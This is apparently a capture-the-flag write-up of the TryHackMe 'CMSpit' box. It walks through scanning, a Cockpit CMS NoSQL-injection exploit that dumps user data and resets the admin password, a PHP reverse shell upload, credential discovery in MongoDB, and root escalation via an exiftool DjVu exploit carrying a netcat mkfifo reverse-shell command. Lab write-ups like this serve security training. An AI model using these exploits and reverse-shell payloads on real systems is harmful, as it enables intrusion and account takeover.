Recon to foothold

Let’s begin as always with a scan

First masscan to pick up all open ports, TCP & UDP

rob:~/ $ sudo masscan -p1-65535,U:1-65535 10.10.187.119 --rate=1000 -e tun0
Starting masscan 1.3.2 (http://bit.ly/14GZzcT) at 2021-09-25 11:59:35 GMT
Initiating SYN Stealth Scan
Scanning 1 hosts [131070 ports/host]
Discovered open port 22/tcp on 10.10.187.119                                   
Discovered open port 80/tcp on 10.10.187.119  

Now nmap to scan these found ports in detail

rob:~/ $ nmap -A -T4 -p22,80 -v 10.10.187.119
Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-25 13:04 BST
NSE: Loaded 153 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 13:04
Completed NSE at 13:04, 0.00s elapsed
Initiating NSE at 13:04
Completed NSE at 13:04, 0.00s elapsed
Initiating NSE at 13:04
Completed NSE at 13:04, 0.00s elapsed
Initiating Ping Scan at 13:04
Scanning 10.10.187.119 [2 ports]
Completed Ping Scan at 13:04, 0.01s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 13:04
Completed Parallel DNS resolution of 1 host. at 13:04, 0.01s elapsed
Initiating Connect Scan at 13:04
Scanning 10.10.187.119 [2 ports]
Discovered open port 22/tcp on 10.10.187.119
Discovered open port 80/tcp on 10.10.187.119
Completed Connect Scan at 13:04, 0.01s elapsed (2 total ports)
Initiating Service scan at 13:04
Scanning 2 services on 10.10.187.119
Completed Service scan at 13:04, 6.28s elapsed (2 services on 1 host)
NSE: Script scanning 10.10.187.119.
Initiating NSE at 13:04
Completed NSE at 13:04, 0.63s elapsed
Initiating NSE at 13:04
Completed NSE at 13:04, 0.05s elapsed
Initiating NSE at 13:04
Completed NSE at 13:04, 0.00s elapsed
Nmap scan report for 10.10.187.119
Host is up (0.011s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 7f:25:f9:40:23:25:cd:29:8b:28:a9:d9:82:f5:49:e4 (RSA)
|   256 0a:f4:29:ed:55:43:19:e7:73:a7:09:79:30:a8:49:1b (ECDSA)
|_  256 2f:43:ad:a3:d1:5b:64:86:33:07:5d:94:f9:dc:a4:01 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-favicon: Unknown favicon MD5: C9CD46C6A2F5C65855276A03FE703735
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
| http-title: Authenticate Please!
|_Requested resource was /auth/login?to=/
|_http-trane-info: Problem with XML parsing of /evox/about
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

NSE: Script Post-scanning.
Initiating NSE at 13:04
Completed NSE at 13:04, 0.00s elapsed
Initiating NSE at 13:04
Completed NSE at 13:04, 0.00s elapsed
Initiating NSE at 13:04
Completed NSE at 13:04, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.73 seconds

Just the two ports found so we can begin by checking out the web page on port 80

This quickly gives us the CMS used, #1: Cockpit

Next up we want to check the version, however here we also get a bit of a clue as to what kind of vulnerability we might be dealing with. A search for “check cockpit cms version” returns a full first page (apart from a link to the cockpit homepage) of vulnerability reports!

The first of these, From 0 to RCE: Cockpit CMS, gives an excellent breakdown of the vulnerabilities found in version (#2) 0.11.1

One of the methods detailed in that article is a NoSQL injection attack (CVE-2020-35846) against the URL (#3) /auth/check

To test this out we can find a working POC over on exploit-db

rob:CMSpit/ $ python3 50185.py -u http://10.10.187.119 
[+] http://10.10.187.119: is reachable
[-] Attempting Username Enumeration (CVE-2020-35846) : 

[+] Users Found : ['admin', 'darkStar7471', 'skidy', 'ekoparty']

[-] Get user details For : admin
[+] Finding Password reset tokens
	 Tokens Found : ['rp-91e82c7813c3b6496c883f4a5b76c141614f207da654f']
[+] Obtaining user information 
-----------------Details--------------------
	 [*] user : admin
	 [*] name : Admin
	 [*] email : admin@yourdomain.de
	 [*] active : True
	 [*] group : admin
	 [*] password : $2y$10$dChrF2KNbWuib/5lW1ePiegKYSxHeqWwrVC.FN5kyqhIsIdbtnOjq
	 [*] i18n : en
	 [*] _created : 1621655201
	 [*] _modified : 1621655201
	 [*] _id : 60a87ea165343539ee000300
	 [*] _reset_token : rp-91e82c7813c3b6496c883f4a5b76c141614f207da654f
	 [*] md5email : a11eea8bf873a483db461bb169beccec
--------------------------------------------


[+] Do you want to reset the passowrd for admin? (Y/n): Y
[-] Attempting to reset admin's password:
[+] Password Updated Succesfully!
[+] The New credentials for admin is: 
 	 Username : admin 
 	 Password : 6csy|agKnV

So we have found (#4) 4 usernames on the system and as seen above, the exploit is effortlessly able to change the admin password for us, which we can verify by logging in

If we wanted to change that password ourselves then the article linked above gives us the way to do that too, with the path (#5) /auth/resetpassword insecurely allowing the change (CVE-2020-35847)

Under ‘Settings | Accounts’ we can find the email for user Skidy

And we get #6: skidy@tryhackme.fakemail

To find the web flag we can use the /finder component which gives us a view like this

And down the bottom of the file list we see an interesting file

Opening this file gives us our flag (#7)

<?php
        $flag = `THM{REDACTED}`";
?>

Let’s get a shell then, we’ll simply upload a php reverse shell using the Finder functionality

And now when we request /revshell.php we pop a shell

rob:CMSpit/ $ nc -lnvp 1234
listening on [any] 1234 ...
connect to [10.14.6.26] from (UNKNOWN) [10.10.187.119] 42410
Linux ubuntu 4.4.0-210-generic #242-Ubuntu SMP Fri Apr 16 09:57:56 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
 06:38:34 up  1:47,  0 users,  load average: 0.01, 0.03, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ 

We’re in!

User www-data to stux

We’ll quickly stabilize our shell (always worth a practice)

$ python3 -c 'import pty; pty.spawn("/bin/bash")'
www-data@ubuntu:/$ ^Z
[1]  + 5747 suspended  nc -lnvp 1234
rob:CMSpit/ $ stty -a
speed 38400 baud; rows 42; columns 98; line = 0;
--snip--
rob:CMSpit/ $ stty raw -echo; fg              
[1]  + 5747 continued  nc -lnvp 1234

www-data@ubuntu:/$ export SHELL=bash
www-data@ubuntu:/$ export TERM=xterm-256color
www-data@ubuntu:/$ stty rows 42 columns 98
www-data@ubuntu:/$ ^C
www-data@ubuntu:/$ 

And now let’s look for the database flag by enumerating MongoDB

www-data@ubuntu:/$ ps -aef | grep mongodb
mongodb    608     1  0 04:51 ?        00:00:14 /usr/bin/mongod --config /etc/mongodb.conf
www-data@ubuntu:/var/www/html/cockpit/storage/data$ ss -tulnp | grep -i listen
tcp    LISTEN     0      128       *:22                    *:*                  
tcp    LISTEN     0      128    127.0.0.1:27017                 *:*                  
tcp    LISTEN     0      128      :::22                   :::*                  
tcp    LISTEN     0      128      :::80                   :::* 

We can see that the database is running on the default port, 27017, bound to the internal loopback, so we can connect with a simple mongo command

www-data@ubuntu:/var/www/html/cockpit$ mongo
MongoDB shell version: 2.6.10
connecting to: test
Welcome to the MongoDB shell.
For interactive help, type "help".
For more comprehensive documentation, see
	http://docs.mongodb.org/
Questions? Try the support group
	http://groups.google.com/group/mongodb-user
2021-09-25T06:51:16.069-0700 In File::open(), ::open for '' failed with errno:2 No such file or directory
> show dbs
admin         (empty)
local         0.078GB
sudousersbak  0.078GB
> use sudousersbak
switched to db sudousersbak
> show collections
flag
system.indexes
user
> db.flag.find()
{ "_id" : ObjectId("60a89f3aaadffb0ea68915fb"), "name" : `THM{REDACTED}`" }

We find a collection called flag and in that collection we get #8: THM{REDACTED}

While we are there let’s enumerate the user collection too

> db.user.find()
{ "_id" : ObjectId("60a89d0caadffb0ea68915f9"), "name" : "p4ssw0rdhack3d!123" }
{ "_id" : ObjectId("60a89dfbaadffb0ea68915fa"), "name" : "stux" }

Let’s check if we have a user stux

www-data@ubuntu:/var/www/html/cockpit/storage/data$ grep stux /etc/passwd
stux❌1000:1000:Coock,,,:/home/stux:/bin/bash

We do! Can we switch to this user then with the found credentials?

rob:CMSpit/ $ ssh stux@10.10.187.119
The authenticity of host '10.10.187.119 (10.10.187.119)' can't be established.
ECDSA key fingerprint is SHA256:l9KCwbaiuh+W1drav8hsO+AG6RnInaVntLRSzM7NkL0.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.187.119' (ECDSA) to the list of known hosts.
stux@10.10.187.119's password: 
Welcome to Ubuntu 16.04.7 LTS (GNU/Linux 4.4.0-210-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage
Last login: Sat May 22 19:41:38 2021 from 192.168.85.1

Yes we can, we have the user stux, and the user flag (#9) too

stux@ubuntu:~$ cat user.txt 
THM{REDACTED}

User stux privesc to root

We can quickly check for sudo permissions

stux@ubuntu:~$ sudo -l
Matching Defaults entries for stux on ubuntu:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User stux may run the following commands on ubuntu:
    (root) NOPASSWD: /usr/local/bin/exiftool

We can check the version of exiftool installed

stux@ubuntu:~$ /usr/local/bin/exiftool -ver
12.05

And a search for CVE’s affecting this version finds us (#10) CVE-2021-22204

Searching for this on exploit-db finds us EBD-ID 49881 which leads us to a paper on the PoC in which we find #11, djvumake, as the binary we need to create the exploit

Ok, let’s give it a go and follow the exploit

stux@ubuntu:~$ vi exploit
stux@ubuntu:~$ cat exploit 
(metadata “\c${system ('whoami‘)};”)
stux@ubuntu:~$ djvumake exploit.djvu INFO=0,0 BGjp=/dev/null ANTa=exploit
stux@ubuntu:~$ ls -la exploit.djvu 
-rw-rw-r-- 1 stux stux 93 Sep 25 07:10 exploit.djvu

Now we can prove the concept by running exiftool first as user stux - we expect the output of the whoami command to be shown before the usual command output

stux@ubuntu:~$ /usr/local/bin/exiftool exploit.djvu 
stux
ExifTool Version Number         : 12.05
File Name                       : exploit.djvu
Directory                       : .
File Size                       : 87 bytes
--snip--

So we see stux printed, so far so good. Now let’s do the same with sudo exiftool

stux@ubuntu:~$ sudo /usr/local/bin/exiftool exploit.djvu 
root
ExifTool Version Number         : 12.05
File Name                       : exploit.djvu
Directory                       : .
File Size                       : 87 bytes
--snip--

Excellent, it showed us root, we have privilege escalation!

Let’s change the command in that exploit file now and get a root shell. We have netcat on the box so we’ll use a simple reverse shell

stux@ubuntu:~$ vi exploit
stux@ubuntu:~$ cat exploit
(metadata "\c${system ('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bash -i 2>&1|nc 10.14.6.26 1234 >/tmp/f')};")
stux@ubuntu:~$ sudo /usr/local/bin/exiftool exploit.djvu 

And we pop a root shell on our listener

rob:CMSpit/ $ nc -lnvp 1234
listening on [any] 1234 ...
connect to [10.14.6.26] from (UNKNOWN) [10.10.187.119] 42494
root@ubuntu:~# id
uid=0(root) gid=0(root) groups=0(root)

And with that we can get the root flag, #12

root@ubuntu:~# cat /root/root.txt
cat /root/root.txt
THM{REDACTED}